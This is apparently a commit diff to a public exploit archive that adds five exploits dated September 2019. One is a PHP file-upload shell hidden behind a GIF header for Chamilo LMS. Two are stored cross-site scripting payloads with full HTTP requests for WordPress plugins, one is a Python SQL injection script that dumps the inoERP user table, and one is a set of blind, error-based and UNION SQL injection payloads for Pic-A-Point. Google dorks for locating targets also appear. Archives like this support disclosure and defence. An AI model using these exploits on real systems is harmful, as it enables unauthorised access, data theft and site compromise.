DB: 2019-09-27
5 changes to exploits/shellcodes Chamillo LMS 1.11.8 - Arbitrary File Upload Duplicate-Post 3.2.3 - Persistent Cross-Site Scripting all-in-one-seo-pack 3.2.7 - Persistent Cross-Site Scripting inoERP 4.15 - 'download' SQL Injection citecodecrashers Pic-A-Point 1.1 - 'Consignment' SQL Injection
This commit is contained in:
parent
ba928141e7
commit
dc44a5e5a6
6 changed files with 246 additions and 0 deletions
55
exploits/php/webapps/47423.txt
Normal file
55
exploits/php/webapps/47423.txt
Normal file
|
@ -0,0 +1,55 @@
|
|||
# Exploit Title: Chamillo LMS 1.11.8 - Arbitrary File Upload
|
||||
# Google Dork: "powered by chamilo"
|
||||
# Date: 2018-10-05
|
||||
# Exploit Author: Sohel Yousef jellyfish security team
|
||||
# Software Link: https://chamilo.org/en/download/
|
||||
# Version: Chamilo 1.11.8 or lower to 1.8
|
||||
# Category: webapps
|
||||
|
||||
# 1. Description
|
||||
# Any registered user can upload files and rename and change the file type to
|
||||
# php5 or php7 by ckeditor module in my files section
|
||||
|
||||
# register here :
|
||||
# http://localhost/chamilo//main/auth/inscription.php
|
||||
# after registration you can view this sections
|
||||
# http://localhost/chamilo/main/social/myfiles.php
|
||||
# http://localhost/chamilo/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0
|
||||
# upload your shell in gif format and then rename the format
|
||||
# if the rename function was desabled and add this GIF89;aGIF89;aGIF89;a before <?PHP
|
||||
# to be like this for examlple
|
||||
|
||||
GIF89;aGIF89;aGIF89;a<html>
|
||||
<head>
|
||||
<title>PHP Test</title>
|
||||
<form action="" method="post" enctype="multipart/form-data">
|
||||
<input type="file" name="fileToUpload" id="fileToUpload">
|
||||
<input type="submit" value="upload file" name="submit">
|
||||
</form>
|
||||
</head>
|
||||
<body>
|
||||
<?php echo '<p>FILE UPLOAD</p><br>';
|
||||
$tgt_dir = "uploads/";
|
||||
$tgt_file = $tgt_dir.basename($_FILES['fileToUpload']['name']);
|
||||
echo "<br>TARGET FILE= ".$tgt_file;
|
||||
//$filename = $_FILES['fileToUpload']['name'];
|
||||
echo "<br>FILE NAME FROM VARIABLE:- ".$_FILES["fileToUpload"]["name"];
|
||||
if(isset($_POST['submit']))
|
||||
{
|
||||
if(file_exists("uploads/".$_FILES["fileToUpload"]["name"]))
|
||||
{ echo "<br>file exists, try with another name"; }
|
||||
else {
|
||||
echo "<br>STARTING UPLOAD PROCESS<br>";
|
||||
if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"],
|
||||
$tgt_file))
|
||||
{ echo "<br>File UPLOADED:- ".$tgt_file; }
|
||||
|
||||
else { echo "<br>ERROR WHILE UPLOADING FILE<br>"; }
|
||||
}
|
||||
}
|
||||
?>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
# and uplaod it as php.gif
|
||||
# you can browse the files form right click and click on browse option
|
48
exploits/php/webapps/47424.txt
Normal file
48
exploits/php/webapps/47424.txt
Normal file
|
@ -0,0 +1,48 @@
|
|||
# Exploit Title: Duplicate-Post 3.2.3 - Persistent Cross-Site Scripting
|
||||
# Google Dork: N/A
|
||||
# Date: 2019-06-11
|
||||
# Exploit Author: Unk9vvN
|
||||
# Vendor Homepage: https://duplicate-post.lopo.it/
|
||||
# Software Link: https://wordpress.org/plugins/duplicate-post/
|
||||
# Version: 3.2.3
|
||||
# Tested on: Kali Linux
|
||||
# CVE: N/A
|
||||
|
||||
# Description
|
||||
# This vulnerability is in the validation mode and is located in the plugin management panel and the vulnerability type is stored . the vulnerability parameters are as follows.
|
||||
|
||||
1.Go to the 'Settings' section
|
||||
2.Enter the payload in the "Title prefix", "Title suffix", "Increase menu order by", "Do not copy these fields" sections
|
||||
3.Click the "Save Changes" option
|
||||
4.Your payload will run
|
||||
|
||||
# URI: http://localhost/wp-admin/options-general.php?page=duplicatepost
|
||||
# Parameter & Payoad:
|
||||
|
||||
duplicate_post_title_prefix="><script>alert(1)</script>
|
||||
duplicate_post_title_suffix="><script>alert(1)</script>
|
||||
duplicate_post_increase_menu_order_by="><script>alert(1)</script>
|
||||
duplicate_post_blacklist="><script>alert(1)</script>
|
||||
|
||||
|
||||
#
|
||||
# PoC
|
||||
#
|
||||
POST /wp-admin/options.php HTTP/1.1
|
||||
Host: localhost
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://localhost/wp-admin/options-general.php?page=duplicatepost
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 981
|
||||
Connection: close
|
||||
Upgrade-Insecure-Requests: 1
|
||||
DNT: 1
|
||||
|
||||
option_page=duplicate_post_group&action=update&_wpnonce=0e8a49a372&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dduplicatepost%26settings-updated%3Dtrue&duplicate_post_copytitle=1&duplicate_post_copyexcerpt=1&duplicate_post_copycontent=1&duplicate_post_copythumbnail=1&duplicate_post_copytemplate=1&duplicate_post_copyformat=1&duplicate_post_copymenuorder=1&duplicate_post_title_prefix=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duplicate_post_title_suffix=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duplicate_post_increase_menu_order_by=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duplicate_post_blacklist=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duplicate_post_roles%5B%5D=administrator&duplicate_post_roles%5B%5D=editor&duplicate_post_types_enabled%5B%5D=post&duplicate_post_types_enabled%5B%5D=page&duplicate_post_show_row=1&duplicate_post_show_submitbox=1&duplicate_post_show_adminbar=1&duplicate_post_show_bulkactions=1&duplicate_post_show_notice=1
|
||||
|
||||
|
||||
# Discovered by:
|
||||
https://t.me/Unk9vvN
|
56
exploits/php/webapps/47425.txt
Normal file
56
exploits/php/webapps/47425.txt
Normal file
|
@ -0,0 +1,56 @@
|
|||
# Exploit Title: all-in-one-seo-pack 3.2.7 - Persistent Cross-Site Scripting
|
||||
# Google Dork: inurl:"\wp-content\plugins\all-in-one-seo-pack"
|
||||
# Date: 2019-06-13
|
||||
# Exploit Author: Unk9vvN
|
||||
# Vendor Homepage: https://semperplugins.com/all-in-one-seo-pack-pro-version
|
||||
# Software Link: https://wordpress.org/plugins/all-in-one-seo-pack/
|
||||
# Version: 3.2.7
|
||||
# Tested on: Windows 10
|
||||
# CVE: N/A
|
||||
|
||||
# Description
|
||||
# This vulnerability is in the validation mode and is located in the all-in-one-seo-pack tab inside the and the vulnerability type is stored . the vulnerability parameters are as follows.
|
||||
|
||||
1.Go to the 'all-in-one-seo-pack' tab
|
||||
2.Select 'general settings' section
|
||||
3.Enter the payload in "Additional Front Page Headers","Additional Posts Page Headers" section
|
||||
4.Click the "Update Options" option
|
||||
4.Your payload will run on visit page
|
||||
|
||||
|
||||
# URI: http://localhost/wordpress/wp-admin/admin.php?page=all-in-one-seo-pack
|
||||
# Payload: "><script>alert(1)</script>
|
||||
|
||||
#
|
||||
# PoC
|
||||
#
|
||||
POST /wordpress/wp-admin/admin.php?page=all-in-one-seo-pack%2Faioseop_class.php HTTP/1.1
|
||||
Host: localhost
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://localhost/wordpress/wp-admin/admin.php?page=all-in-one-seo-pack%2Faioseop_class.php
|
||||
Content-Type: multipart/form-data; boundary=---------------------------24442753012045
|
||||
Content-Length: 8625
|
||||
Connection: close
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
-----------------------------24442753012045
|
||||
Content-Disposition: form-data; name="aiosp_front_meta_tags"
|
||||
|
||||
"><script>alert(1)</script>
|
||||
-----------------------------24442753012045
|
||||
Content-Disposition: form-data; name="aiosp_home_meta_tags"
|
||||
|
||||
"><script>alert(1)</script>
|
||||
-----------------------------24442753012045
|
||||
|
||||
Content-Disposition: form-data; name="Submit"
|
||||
|
||||
Update Options »
|
||||
-----------------------------24442753012045--
|
||||
|
||||
|
||||
# Discovered by:
|
||||
https://unk9vvn.com
|
48
exploits/php/webapps/47426.txt
Normal file
48
exploits/php/webapps/47426.txt
Normal file
|
@ -0,0 +1,48 @@
|
|||
# Exploit Title: inoERP 4.15 - 'download' SQL Injection
|
||||
# Date: 2019-09-13
|
||||
# Exploit Author: Semen Alexandrovich Lyhin
|
||||
# Vendor Homepage: http://inoideas.org/
|
||||
# Version: 4.15
|
||||
# CVE: N/A
|
||||
|
||||
|
||||
# A malicious query can be sent in base64 encoding to unserialize() function.
|
||||
# It can be deserialized as an array without any sanitization then.
|
||||
# After it, each element of the array is passed directly to the SQL query.
|
||||
|
||||
|
||||
#!/bin/python
|
||||
|
||||
import os
|
||||
import base64
|
||||
import requests
|
||||
import sys
|
||||
|
||||
def generatePayload(query):
|
||||
#THIS FUNCTION IS INSECURE BY DESIGN
|
||||
b64_query = base64.b64encode(query);
|
||||
return os.popen("php -r \"echo base64_encode(serialize(base64_decode('" + b64_query + "')));\"").read()
|
||||
|
||||
|
||||
def ExecSQL(query):
|
||||
data = {"data":query,
|
||||
"data_type":"sql_query"}
|
||||
|
||||
r = requests.post("http://" + ip + "/download.php", data=data)
|
||||
return r.content
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
|
||||
if len(sys.argv) != 3:
|
||||
print '(+) usage: %s <target> ' % sys.argv[0]
|
||||
print '(+) eg: %s 127.0.0.1 "ierp/" ' % sys.argv[0]
|
||||
exit()
|
||||
|
||||
ip = sys.argv[1] + "/" + sys.argv[2]
|
||||
|
||||
#if don't have php, set Payload to the next one to check this SQLi via "select @@version;" payload: czoxNzoic2VsZWN0IEBAdmVyc2lvbjsiOw==
|
||||
|
||||
data = r"select * from ino_user;"
|
||||
|
||||
print ExecSQL(generatePayload(data));
|
34
exploits/php/webapps/47427.txt
Normal file
34
exploits/php/webapps/47427.txt
Normal file
|
@ -0,0 +1,34 @@
|
|||
# Exploit Title: citecodecrashers Pic-A-Point 1.1 - 'Consignment' SQL Injection
|
||||
# Author: Cakes
|
||||
# Discovery Date: 2019-09-26
|
||||
# Vendor Homepage: https://github.com/citecodecrashers/Pic-A-Point
|
||||
# Software Link: https://github.com/citecodecrashers/Pic-A-Point/archive/master.zip
|
||||
# Tested Version: 1.1
|
||||
# Tested on OS: CentOS 7
|
||||
# CVE: N/A
|
||||
|
||||
# Discription:
|
||||
# Simple SQL injection after application authentication.
|
||||
|
||||
# POST Request
|
||||
|
||||
# Parameter: Consignment (POST)
|
||||
# Type: boolean-based blind
|
||||
# Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
|
||||
|
||||
Payload: Consignment=1234' AND 9752=(SELECT (CASE WHEN (9752=9752) THEN 9752 ELSE (SELECT 1018 UNION SELECT 3533) END))-- QBEy&Submit=Trace now
|
||||
|
||||
# Type: error-based
|
||||
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
|
||||
|
||||
Payload: Consignment=1234' AND (SELECT 4396 FROM(SELECT COUNT(*),CONCAT(0x7162707871,(SELECT (ELT(4396=4396,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- hufy&Submit=Trace now
|
||||
|
||||
# Type: time-based blind
|
||||
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
|
||||
|
||||
Payload: Consignment=1234' AND (SELECT 9267 FROM (SELECT(SLEEP(5)))qpkL)-- OiWK&Submit=Trace now
|
||||
|
||||
# Type: UNION query
|
||||
# Title: Generic UNION query (NULL) - 20 columns
|
||||
|
||||
Payload: Consignment=1234' UNION ALL SELECT NULL,CONCAT(0x7162707871,0x614b666177515872456a7177706f6b654d54744e75644e4b597648496742464c6346656865654e67,0x716a7a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- cUud&Submit=Trace now
|
|
@ -41760,3 +41760,8 @@ id,file,description,date,author,type,platform,port
|
|||
47419,exploits/php/webapps/47419.txt,"WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting",2019-09-25,strider,webapps,php,
|
||||
47420,exploits/json/webapps/47420.txt,"NPMJS gitlabhook 0.0.17 - 'repository' Remote Command Execution",2019-09-25,"Semen Alexandrovich Lyhin",webapps,json,
|
||||
47422,exploits/php/webapps/47422.txt,"YzmCMS 5.3 - 'Host' Header Injection",2019-09-25,"Debashis Pal",webapps,php,
|
||||
47423,exploits/php/webapps/47423.txt,"Chamillo LMS 1.11.8 - Arbitrary File Upload",2019-09-26,"Sohel Yousef",webapps,php,
|
||||
47424,exploits/php/webapps/47424.txt,"Duplicate-Post 3.2.3 - Persistent Cross-Site Scripting",2019-09-26,Unk9vvN,webapps,php,
|
||||
47425,exploits/php/webapps/47425.txt,"all-in-one-seo-pack 3.2.7 - Persistent Cross-Site Scripting",2019-09-26,Unk9vvN,webapps,php,
|
||||
47426,exploits/php/webapps/47426.txt,"inoERP 4.15 - 'download' SQL Injection",2019-09-26,"Semen Alexandrovich Lyhin",webapps,php,
|
||||
47427,exploits/php/webapps/47427.txt,"citecodecrashers Pic-A-Point 1.1 - 'Consignment' SQL Injection",2019-09-26,cakes,webapps,php,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue